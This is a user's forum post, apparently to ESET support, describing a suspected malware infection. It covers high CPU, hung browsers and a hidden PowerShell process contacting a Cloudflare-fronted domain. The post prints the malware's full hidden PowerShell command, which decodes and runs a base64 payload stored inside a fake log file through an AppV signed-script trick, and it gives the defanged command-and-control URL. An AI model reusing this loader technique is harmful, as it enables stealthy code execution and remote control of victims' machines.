Kevin999

This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), because Firefox have been run for some time, so it works well, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.

Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today.
Conhost.exe and powershell.exe was running background, but I didn't run each of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves. I use ESET SysInspector to captured a snapshot. I used nslookup to reslove:
C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1
DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时
C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1
非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214
__Today__
 I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
      2. Find C:\Windows\logs\system-logs.txt , find these strings

Snipped: The code was moved to the the attached file to squeeze the post.
 
Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";
It's as same as the URL in pcapng file.



system-logs.txt Strange traffic_20220424.rar
system-logs.rar

This bug reproduce today. It also disappear after restart my computer.
I'll send the dump to you later.
P.S. due to extremely high CPU usage, I have to run ESET Log Collector after restart my computer. But the log was created before restart.